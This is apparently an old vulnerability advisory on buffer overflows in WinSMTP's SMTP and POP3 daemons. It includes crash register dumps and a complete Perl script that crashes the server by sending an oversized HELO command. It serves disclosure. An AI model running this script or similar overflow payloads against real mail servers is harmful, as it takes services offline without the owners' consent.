COMMAND

    WinSMTP

SYSTEMS AFFECTED

    WinSMTP mailer/pop3d daemon. Version 1.06f and 2.X

PROBLEM

    'dethy' found following.   WinSMTP is an  Internet Mailer  Daemon,
    providing SMTP and  POP3 support for  sending and recieving  mail.
    These services can be  used by a front  end, that make use  of the
    UNIX  mailbox  or   POP3  services  provided   by  this   product.
    Regristration of  the shareware  version is  $50 and  $100 for the
    commerical version (USD).   This product is  trivially old but  is
    still supported and available to purchase.

    Vulnerability occurs in a number  of fields in both smtp  and pop3
    daemons, effectively allowing remote code execution to take  place
    upon the remote host.

    Example of this overflow can  be observed in the smtpd  by sending
    a long HELO [buffer] command, where [buffer] is approximately  170
    bytes resulting in the following error:

        WINSMTP caused a general protection fault
        in module WINSMTP.EXE at 0003:00002359.
        Registers:
        EAX=461e0001 CS=42e7 EIP=00002359 EFLGS=00000246
        EBX=00807fe0 SS=4207 ESP=00007e36 EBP=00004141
        ECX=00010283 DS=4207 ESI=0000544c FS=05c7
        EDX=58600000 ES=461e EDI=00001547 GS=0000
        Bytes at CS:EIP:
        cb 49 73 49 63 6f 6e 69 63 00 00 58 4c 6f 63 00
        Stack dump:
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141

    As we can see 41414141 is "A" (which we had sent), with EBP  being
    overwritten.  The same can be  observed in the pop3d by sending  a
    long  USER  [buffer],  where  [buffer]  is approximately 370 bytes
    resulting in the following error:

        WINSMTP caused a general protection fault
        in module WINSMTP.EXE at 0001:00009e93.
        Registers:
        EAX=00000000 CS=7c9f EIP=00009e93 EFLGS=00000246
        EBX=00007cea SS=77cf ESP=00007e1c EBP=00004141
        ECX=00000362 DS=77cf ESI=00000005 FS=0000
        EDX=0000565f ES=77cf EDI=00002c40 GS=0000
        Bytes at CS:EIP:
        cb 55 8b ec b8 30 01 9a 0c 03 9f 7c 56 57 c7 46
        Stack dump:
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141

    Since  this  is  a  windows  exploit,  the offset to overwrite the
    correct register  will vary  from system  to system  (depending on
    system  configuration)  etc,  thus  no  real  point  in making on.
    Instead below is  a remote DoS  that will cause  WinSMTP to crash,
    and will manually need to be restarted.

    #!/usr/bin/perl
    #
    # ./$0.pl -s <server>
    # sends data to stmpd, overflowing server buffer.
    #
    use Getopt::Std;
    use IO::Socket;
    getopts('s:', \%args);
    if(!defined($args{s})){&usage;}
    $serv = $args{s};
    $foo = "A"; $number = 170;
    $data .= $foo x $number; $EOL="\015\012";
    $remote = IO::Socket::INET->new(
		        Proto	=> "tcp",
		        PeerAddr	=> $args{s},
		        PeerPort	=> "smtp(25)",
		    ) || die("Unable to connect to smtp port at $args{s}\n");
    $remote->autoflush(1);
    print $remote "HELO $data". $EOL;
    while (<$remote>){ print }
    
    print("\nCrash was successful !\n");
    
    sub usage {die("\n$0 -s <server>\n\n");}

SOLUTION

    Vendor had been contacted, wait until a patched version comes  out
    or use an alternative product.